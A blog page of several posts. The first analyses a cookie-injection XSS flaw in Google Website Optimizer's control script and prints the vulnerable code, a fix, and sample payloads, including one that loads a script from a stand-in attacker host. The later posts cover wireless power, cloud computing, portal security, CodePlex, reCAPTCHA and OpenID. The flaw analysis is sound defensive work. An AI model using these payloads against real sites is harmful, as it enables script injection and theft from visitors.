SolutionOnline's Blog an idea at work


Google XSS Flaw in Website Optimizer Scripts

This week thousands of system administrators who make use of Google products will open their inbox to see an email from Google explaining that their Website Optimizer product contains a cross-site scripting flaw that allows hackers to inject scripts into their Google-optimized web pages.

A part of this email follows:

“you are using a control script that could allow an attacker to execute malicious code on your site. To fix the vulnerable section of code, you should immediately either replace the control scripts in your affected experiments or stop the affected experiments and start new experiments”

On receiving this notification I quickly scrambled to my web sites to immediately implement the fix recommended by Google. Later in the day I had time to dig deeper into the problem and analyse the security flaw in more detail. What I found is a multi-staged attack that relies on cookie injection, improper text parsing and DOM script injection.

I have documented my research in this article, and I hope that it will be of use to you. There is a lot to learn from other people’s mistakes, especially when those people are Google themselves.

The flaw exists in Google's Website Optimizer, which is a series of scripts that web administrators use to gain insight into how their web sites are navigated by online customers.

Below is a segment of the flawed code.

<!-- Google Website Optimizer Control Script -->
function utmx_section(){}function utmx(){}
(function(){var k='XXXXXXXXXX',d=document,l=d.location,c=d.cookie;function f(n){
if(c){var i=c.indexOf(n+'=');if(i>-1){var j=c.indexOf(';',i);return c.substring(i+n.
length+1,j<0?c.length:j)}}}var x=f('__utmx'),xx=f('__utmxx'),h=l.hash;
d.write('<sc'+'ript src="'+
'http'+(l.protocol=='https:'?'s://ssl':'://www')+'.google-analytics.com'
+'/siteopt.js?v=1&utmxkey='+k+'&utmx='+(x?x:'')+'&utmxx='+(xx?xx:'')
+'&utmxtime='+new Date().valueOf()+(h?'&utmxhash='+escape(h.substr(1)):'')+
'" type="text/javascript" charset="utf-8"></sc'+'ript>')})();
<!-- End of Google Website Optimizer Control Script -->

This Website Optimizer Control Script is embedded within your web page to track it. It runs in the user's browser and, under a successful attack, it will extract a malicious script from a cookie and execute it there.

The code above is standard JavaScript, but it is not easy to read. There are two reasons for this: firstly, like most Google client-side scripts, it is obfuscated, purposely making it cryptic; secondly, it was designed to run fast and efficiently, not to be easily understood.

I manually de-obfuscated this code and, whilst doing that, re-factored it to make it easier to understand. The code below should be easy enough for anyone with JavaScript knowledge to read, yet it fulfills the same function as the cryptic code provided by Google.

01.  function AB_Analysis(){
03.     var d=document;
04.     var l=d.location;
05.     var h=l.hash;
06.     var injectionvector1 = ReadFromCookie('__utmx');
07.     var injectionvector2 = ReadFromCookie('__utmxx');
08.     d.write
09.     ('<script src='+k
10.     +'&utmx=' + injectionvector1
11.     +'&utmxx='+ injectionvector2
12.     +'&utmxtime=' + new Date().valueOf()
13.     +(h?'&utmxhash='+escape(h.substr(1)):'')
14.     + '" type="text/javascript" charset="utf-8"></script>')
15.  }
17.   function ReadFromCookie(field_name){
18.     var c = document.cookie;
19.     var start = c.indexOf(field_name+'=');
20.     var end = c.indexOf(';',start);
21.     return c.substring(start + field_name.length + 1, end);
22.   }
The security flaw starts in lines 06 and 07:
06.     var injectionvector1 = ReadFromCookie('__utmx');
07.     var injectionvector2 = ReadFromCookie('__utmxx');

Both these lines call into the function ReadFromCookie, which parses the cookie string without sanitising the input. The lack of sanitisation is on line 21:

21. return c.substring(start + field_name.length + 1, end);

Here we can see a classic mistake: data is blindly read from an untrusted source. The substring call reads from the start of the field's data all the way to the first semicolon. What it reads should be a tracking number, but in this case it is a specifically planted 'dormant' script. It is dormant because it resides inside a cookie and not inside the HTML of the web page itself. Lines 10 and 11 are where the real trouble begins to show, as the extracted and potentially dangerous script is injected into the user's DOM:
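To see the parsing problem in isolation, here is the flawed logic rewritten as a pure function (a hypothetical stand-alone refactor for demonstration; the real script reads document.cookie directly). Whatever sits between the `=` and the next `;` comes back verbatim, payload and all:

```javascript
// Hypothetical stand-alone version of ReadFromCookie, for demonstration only.
function readFromCookie(cookie, fieldName) {
  var start = cookie.indexOf(fieldName + '=');
  if (start < 0) return undefined;
  var end = cookie.indexOf(';', start);
  // No sanitisation: everything between '=' and ';' is returned unmodified.
  return cookie.substring(start + fieldName.length + 1,
                          end < 0 ? cookie.length : end);
}

// A benign cookie yields the expected tracking value...
console.log(readFromCookie('__utmx=12345.67890; __utmxx=abc', '__utmx'));
// → "12345.67890"

// ...but an attacker-planted cookie yields the dormant payload, untouched.
// (The string is split with '+' only so this sample can sit inside a page.)
var hostile = '__utmx="></scr' + 'ipt><scr' + 'ipt>alert(1)</scr' + 'ipt>; a=1';
console.log(readFromCookie(hostile, '__utmx'));
```

Nothing malicious has executed yet at this point; the function has merely handed the payload, character for character, to the code that builds the script tag.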

08.     d.write
09.     ('<script src='+k
10.     +'&utmx=' + injectionvector1
11.     +'&utmxx='+ injectionvector2
12.     +'&utmxtime=' + new Date().valueOf()
13.     +(h?'&utmxhash='+escape(h.substr(1)):'')
14.     + '" type="text/javascript" charset="utf-8"></script>')

The code above is responsible for the fatal injection. There is some irony here: within the same statement there exists some protection against XSS, but it does not go far enough.

Look at line 13:

13. +(h?'&utmxhash='+escape(h.substr(1)):'')

This code correctly treats the DOM hash (variable h) as untrusted, because it can be manipulated in a similar way to the cookie. The lines before it, however, omit calling the escape() function that would sanitise the cookie values against XSS and similar attacks. It's a typical case of 'so close, yet so far away'.
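One way to close the hole, sketched below, is to treat the cookie values exactly as the hash is treated and encode them before concatenation. This is a sketch of the principle, not Google's actual patch, and the function name and simplified URL are hypothetical; modern code would prefer encodeURIComponent() over the older escape():

```javascript
// Hypothetical hardened version of the URL-building step.
function buildScriptUrl(key, utmx, utmxx, hash) {
  var url = 'siteopt.js?utmxkey=' + key
    + '&utmx=' + encodeURIComponent(utmx || '')
    + '&utmxx=' + encodeURIComponent(utmxx || '')
    + '&utmxtime=' + new Date().valueOf();
  if (hash) url += '&utmxhash=' + encodeURIComponent(hash);
  return url;
}

// An injected payload is now inert: the quote and angle brackets that would
// have broken out of the src="..." attribute arrive percent-encoded.
var payload = '"></scr' + 'ipt><scr' + 'ipt>alert(1)</scr' + 'ipt>';
var url = buildScriptUrl('XXXXXXXXXX', payload, '', '');
console.log(url.indexOf('<') === -1 && url.indexOf('"') === -1);  // true
```

With the values encoded, the worst an attacker can do is hand the tracking server a garbled parameter; the markup of the page itself can no longer be altered.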

For those who find it hard to read JavaScript, I have included a flow chart showing the two functions, AB_Analysis and ReadFromCookie.

AB Analysis Function

The diagram above is a flowchart for the AB_Analysis script. This script is embedded on pages by web developers who are making use of the Google Website Optimizer. The red processes are where data is read from the cookie and added to a script, which is in turn injected into the DOM.

ReadFromCookie flowchart

Above is a flowchart for the ReadFromCookie function. There is no actual flaw here, except perhaps that there is no limit to how much data is read out of the cookie. Also, the end-of-record detection is rather crude, simply looking for a semicolon in the data.

Below is how a normal cookie might look. Cookies are not very sophisticated and are generally described as simple text records stored by the user's browser. HTML5 adds richer client-side storage mechanisms, such as Web Storage and IndexedDB, alongside cookies.

Normal Cookie Example

__utmx=some_value;
__utmxx=some_other_value;

The compromised cookie below contains script inside the __utmx and __utmxx fields. This script is not active and therefore not dangerous on its own. However, when the AB_Analysis script is executed, the dormant payload gets activated, completing the XSS attack.

Compromised Cookie Example

__utmx=<<malicious script goes here>>;
__utmxx=<<malicious script goes here>>;
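To make the consequence concrete, the sketch below builds the markup that d.write would receive once such a cookie value is spliced in. The attacker URL and the simplified parameter list are hypothetical, and the strings are split with '+' only so the sample can sit inside a page:

```javascript
// What the injected markup looks like once the cookie value is spliced in.
// The payload's '">' closes the src attribute and the script tag early, and
// the browser then parses the attacker's own <script> element that follows.
var injectionvector1 = '"></scr' + 'ipt><scr'
  + 'ipt src="http://evil.example/x.js"></scr' + 'ipt>';
var markup = '<scr' + 'ipt src="XXXXXXXXXX'
  + '&utmx=' + injectionvector1
  + '" type="text/javascript"></scr' + 'ipt>';
console.log(markup);
```

The browser has no way of knowing that the second script element came from a cookie rather than from the site's author, so it fetches and runs the attacker's file with the full privileges of the page.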

The attack is two-staged: first, the malicious script has to be injected into a cookie in the victim's browser. After that, the user must visit a web page containing the Google AB_Analysis script. The attack is summarised in the diagram below.

Attack on Google Web Optimizer


Google was fast to react and provide a fix; however, this fix needs to be deployed by every web site administrator who uses Google Website Optimizer. This applies to hundreds of thousands of web pages globally.

I hope that administrators are quick to fix this problem as it could easily result in an XSS attack against their site if targeted.

Full instructions on different options on applying the fix can be found on the official Google support page.



Power’s in The Air

Tired Of Being Wired

If phones, mice and keyboards can go wireless, why not everything else? In fact, about a hundred years ago, that untamed genius Nikola Tesla had already begun building a tower at Wardenclyffe to demonstrate the transmission of electricity without the use of wires.

On a humbler scale, researchers at MIT are in the process of repeating the experiment with their own ideas and less ostentatious techniques.


Marin Soljacic, assistant professor of physics at MIT, has spent a considerable number of years trying to figure out how to transmit power without cables. Radio waves lose too much energy during their passage through the air, and lasers are constrained by the necessity of line-of-sight. Soljacic decided to use resonant coupling, in which two objects vibrating at the same frequency can exchange energy without harming things around them. He used magnetic resonance and, along with his colleagues John Joannopoulos and Peter Fisher, succeeded in lighting up a 60-watt bulb two metres away. What they did was this: two resonant copper coils were hung from the ceiling, two metres away from each other. Both were tuned to the same frequency and one had a light bulb attached to it. When current was passed through one coil, it created a magnetic field and the other coil resonated, generating an electric current. And then there was light. The experiment succeeded in spite of a thin screen being placed between the two copper coils.

And if this comes through…

One of the most obvious results is that we won't have dozens of cables to trip over in our offices and rooms. Primarily, the aim of this research team is to achieve a cable-free environment wherein your laptops, PDAs and mobile phones could charge themselves (with all the electricity floating around) and even, maybe, get rid of the batteries that are so much an essential part of our portable devices today. Magnetic fields interact very weakly with biological organisms, and this little fact makes the approach far safer for us. While this experiment happened about a year ago, the team is still hard at work trying out other materials so as to increase the efficiency of the power transfer from 50 per cent to 80 per cent. Once that happens, both industry and individuals will grab hold of it and never let go.


Cloud Computing


Cloud computing is an emerging computing technology that uses the internet and central remote servers to maintain data and applications. Cloud computing allows consumers and businesses to use applications without installation and access their personal files at any computer with internet access. This technology allows for much more efficient computing by centralizing storage, memory, processing and bandwidth.

It is one of the latest trends in the IT industry and has made people think twice before building up specialized IT departments. Normally a server has an operating system installed on it, and the user has his own programs, documents and software installed there; if he uses another server, he will not get the data stored on the original one. In cloud computing, by contrast, the user logs into a centrally hosted system: all the data he wants to store or process lives on a central server, and to access it directly all he has to do is log in with his ID and password.

Cloud computing is a style of computing in which dynamically scalable and often virtualized resources are provided as a service over the Internet. Users need not have knowledge of, expertise in, or control over the technology infrastructure in the “cloud” that supports them.

Cloud Computing: Need and Effectiveness

An entrepreneur has big ideas to streamline his business and pull his sales up so as to maximize his profits. To do all this, his ideas need a number of business applications. But these business applications have huge complexities behind them: they need a data center with office space, power, cooling, bandwidth, networks, servers and storage, plus a team of experts to install, configure and run them. They need development, testing, staging, production and failover environments. This leads to a complicated software stack. Moreover, a small upgrade can bring the whole system down! And that is for one application; multiply these headaches across dozens or hundreds of apps, and it's easy to see why even the biggest companies with the best IT departments aren't getting the apps they need. Small businesses don't stand a chance.

Cloud computing is a better way to run a business. Instead of running the applications oneself, they run in a shared data center. When one uses an application that runs in the cloud, he just logs in, customizes it, and starts using it.

Businesses are running all kinds of applications in the cloud these days. Cloud-based applications can be up and running in a few days, which is unheard of with traditional business software. They cost less, because one doesn’t need to pay for all the people, products, and facilities to run them. And, it turns out they’re more scalable, more secure, and more reliable than most apps. Plus, upgrades are taken care of for the user, so his applications get security and performance enhancements and new features—automatically.

The way one pays for cloud-based applications is also different. Forget about buying servers and software. When one’s applications run in the cloud, he doesn’t buy anything. It’s all rolled up into a predictable monthly subscription, so he only pays for what he actually uses. Finally, cloud applications don’t eat up the valuable IT resources. This lets one focus on deploying more apps, new projects, and innovation.

The advantages of Cloud Computing are summarized and listed below:

  • Fast to get started
  • Costs less
  • More scalable
  • More secure
  • More reliable
  • No servers or storage needed
  • No technical team needed
  • No upgrades needed
  • User friendly
  • Applicable to both consumer and business applications
  • Added option of custom-built apps.
  • Multi-tenancy
  • Flexible: one can customize it to specific needs
  • Applications get added features and enhanced performance automatically
  • Nothing to buy: a predictable monthly subscription
  • Doesn't eat up valuable IT resources

Thus we can conclude that Cloud computing is a simple idea, but it can have a huge impact on your business.

With all these advantages, it’s difficult to think of reasons why we shouldn’t consider switching to a cloud computing IT environment. We have significantly fewer in house IT costs, we pay only for the computing resources we use, and cloud computing networks are often more secure than traditional business systems. And with the new collaboration abilities created by a cloud computing enabled workspace, we’ll be able to accomplish work more efficiently than ever before.


Securing your Portal

Enterprise portals enable the direct participation of customers in key business processes and form part of the business infrastructure of organizations in many industries, including financial services, healthcare, telecommunications and government. But major security issues are associated with this growing usage, including concerns about privacy, secure access management, fraud, and the increased risk and cost of security breaches, which are further magnified as the external user population grows. Portals normally contain important information and are deployed to user populations where authenticating users and controlling access to resources are critical. The strategic significance of these portals means organizations need to apply security solutions that meet internal policies, address regulatory requirements and provide the right level of security to protect customer identities. Portals, when not properly secured, invite unauthorized access to company networks by curiosity seekers or, even worse, hackers and fraudsters.

Following are some tips that can be useful in securing the portals and protecting both the network and the customers:

Strengthening the portal:

This can be done by:

  • Ensuring that all users, whether employees, partners, suppliers or customers, have secure and convenient access, but only to the data and resources they need to perform their tasks.
  • Centralizing access-policy administration: this helps manage and enforce portal access-control policies centrally and cost-effectively, based on end-user roles, risk level or dynamic attributes.
  • Knowing the customers properly, since secure portals begin at the initial customer enrolment phase.

Simplifying Customer security:

Customers always want convenient network access. At the same time, they demand a high level of security for the network and their sensitive data, given the recent rise in online fraud and unauthorized access to enterprise networks and confidential information. Organizations therefore require a solution that delivers strong portal authentication without hampering the customer's experience or privacy. This may be done by:

  • Increasing customer usage by enabling access to multiple applications within the network with single sign-on (SSO), eliminating the frustration of tracking multiple passwords.
  • Using risk-based authentication, which delivers both strong security and convenience to customers by minimizing the number of unnecessary challenges and lockouts.

Inspiring customer confidence:

Organizations that assure customers that their personal and business information is safe are always a step ahead of their competitors. As they provide secure online access, the number of transactions that customers conduct online will rise and, as a result, their brand loyalty will also be enhanced. The security measures, along with a complete and clear explanation of the security solution, should be communicated to the customer so that he is confident about the safety of the portal. Moreover, by deploying a security solution that provides customers with site-to-user authentication, customers are assured that they have reached a legitimate site, and not a fraudulent site designed to capture their credentials for the purpose of committing fraud at some future date. This sense of security boosts customer confidence without compromising the user experience, leading to a significant increase in portal adoption and customer satisfaction.


Microsoft unveils new open-source initiative: if you can't beat them, join them!

Seems to be the new Microsoft strategy. After coming into the spotlight recently for donating around 20,000 lines of code to the open source community (to help Windows run on Linux virtualization platforms), they have now started a new open source foundation, CodePlex, not to be confused with their open source code-sharing web site of the same name. Their new foundation, it seems, is an effort to get more commercial companies to participate in open source ventures. As they state on their FAQ page: "We believe that commercial software companies and the developers that work for them under-participate in open source projects."

Sounds familiar. Isn't that exactly what Microsoft did with its own open source submission? As taken from the blog of a Linux kernel developer about Microsoft's Hyper-V kernel drivers code submission: "Over 200 patches make up the massive cleanup effort needed to just get this code into a semi-sane kernel coding style (someone owes me a big bottle of rum for that work!). Unfortunately the Microsoft developers seem to have disappeared, and no one is answering my emails. If they do not show back up to claim this driver soon, it will be removed in the 2.6.33 release. So sad..."

The open source community is one of instant feedback and continuous change, where projects continually get forked and die out. Microsoft just jumped into the deep end of the pool. Their new foundation aims to be an organization much like Mozilla, Gnome and KDE, but one which caters to a much broader spectrum of software projects. Another citation from their FAQ, which seems almost satirical (Poe's law could apply here): "Specifically we aim to work with particular projects that can serve as best practice exemplars of how commercial software companies and open source communities can effectively collaborate." The cojones!
While the foundation does include members of the open source community, it is questionable how much experience Microsoft could possibly have gained about collaborating with open source communities during its singular code dump which it failed to maintain.


Google acquires reCAPTCHA

reCAPTCHA, another one of the internet's most innovative projects, is now in Google's grasp. Not only is reCAPTCHA an effective device against spam, it also manages to accomplish a mission: converting a large volume of printed literature to text. While most such services automatically generate distorted letters, making them difficult for anyone but a human to discern, reCAPTCHA goes about it differently: every time you prove that you are a human, you are effectively helping the process of digitizing printed documents. Instead of using ever better algorithms to generate distortions which can only be recognized by humans, reCAPTCHA uses portions of scanned documents which failed to be recognized by the OCR (Optical Character Recognition) algorithms used to digitize them; often these can easily be recognized by humans.

With the support and resources of Google behind reCAPTCHA, it is possible for the project to shift into an even higher gear. With Google services using reCAPTCHA, and with more resources from Google to make reCAPTCHA more easily available and implementable, it is bound to see an increase in adoption. Projects such as Google Books and Google News search already use reCAPTCHA to help digitize a great volume of scans of old books, magazines and newspapers. Word by word, reCAPTCHA aims to digitize a large part of past documents which right now exist only in print, making more and more of our history indexable, searchable, and accessible to a greater public.


Open ID Too Much To Take

When you sign into your Gmail account, you're automatically signed into all Google services: Docs, Blogger, Reader, whatever. And you like that, don't you? We do too. It's hassle-free, and hassle-free is good indeed. But then you need another ID for your Yahoo! account. And another for your Windows Live services. And another for some other service we can't really think of right now.

And then came Open ID, the initiative that promised us a single ID. If you remember just one password, you're set to access all the services you ever need. It's more hassle-free than what we're used to now, so it can only be better.

In January this year, there were only two players supporting the platform: Yahoo! and AOL. And we don't know about you, but we remember sticking to our Yahoo! IDs to access the services. Now, however, more of the big guns have joined the movement for Open ID: Google, MySpace and Microsoft, among others, announced their support for the platform in October.

Finally, it looks like the way is paved for a Web that's much easier to access; henceforth, we'll only have one ID to remember. Even better, you already have an Open ID, so there's none of this registration nonsense to contend with. Only one problem, though: people don't seem to be using it. It's not that people aren't enthusiastic about it, either (you're probably getting pretty excited about Open ID yourself, we can tell); it's just that they can't figure it out. When Yahoo! studied the success of their Open ID system, they saw one critical flaw: users found the system absolutely befuddling.

But is it really that befuddling, or are we talking stupid users here? Turns out, logging into a service with an Open ID is considerably befuddling indeed. First, there's the matter of your ID. You don't register for one: if you have some sort of Web presence, Blogger or Yahoo!, for example, you already have an Open ID. In the former case, it's your blog address; in the latter, it's a little complicated. Then there's the login process itself. It isn't as simple as username-and-password any more. Let's say you want to use your Blogger address as your Open ID. You enter your blog URL in the box that asks for your Open ID, and click on Login. Then you'll be taken to Blogger, where you'll have to log in using your Google ID. And then you'll go back to the site you were trying to log into, and you'll be signed in. Dizzy yet? And the process changes for every Open ID-toting service, too. And we know what you're thinking: unless the companies get their act together and stop sending us bouncing around the Internet, we'll keep our passwords, thank you.